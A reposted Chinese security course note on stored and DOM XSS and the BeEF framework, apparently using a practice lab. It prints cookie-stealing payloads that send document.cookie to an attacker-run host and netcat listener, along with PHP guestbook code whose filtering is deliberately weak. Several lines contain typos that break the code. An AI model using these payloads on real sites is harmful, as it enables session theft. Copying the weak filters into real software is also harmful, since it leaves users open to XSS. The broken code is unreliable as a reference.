admin管理员组文章数量:1582712
存储型XSS 长期存储于服务器端 每次用于访问都会被执行javascript脚本 Name:客户端表单长度限制 客户端、截断代理 <script src=http://1.1.1.1/a.js></script> a.js源码 var img = new Image(); img.src = "http://1.1.1.1:88/cookies.php?cookie="+documnet.cookie; |
root@R:~# netstat -pantu | grep 80
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 771/gsad
tcp 0 0 192.168.1.102:34212 140.98.195.27.80 ESTABLISHED 2840/wget
tcp6 0 127.0.0.1:8080 :::* LISTEN 2387/java
root@R:~# kill 771
root@R:~# service apache2 start
root@R:~# cd /var/www/html/
root@R:/var/www/html# gedit a.js
var img = new Image();
img.src = "http://192.168.1.102:88/cookies.php?cookie="+documnet.cookie;
root@R:~# nc -nlvp 88
----------------------------------------------------------------------
低安全代码
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
---------------------------------------------------------------------------
中安全代码
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = trim(strip_tags(addslashed($message)));
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message);
// Sanitize name input
$name = str_replace('<script>','',$name);
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
----------------------------------------------------------------------------------
高安全代码
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message);
// Sanitize name input
$name = str_replace('<script>','',$name);
$name = mysql_real_escape_string($name);
$name = htmlspecialchars($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
----------------------------------------------------------------------------------
XSS DOM型XSS <script>var img=document.createElememt("img");img.src="http://192.168.1.102:88/log ?"+escape(document.cookie);</script> |
root@R:~# vi 1
<script>var img=document.createElememt("img");img.src="http://192.168.1.102:88/log?"+escape(document.cookie);</script>
root@R:~# nc -nlvp 88
BEEF 浏览器攻击面 应用普遍转移到B/S架构,浏览器成为统一客户端程序 |
版权声明:本文标题:【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1726398363a1069028.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论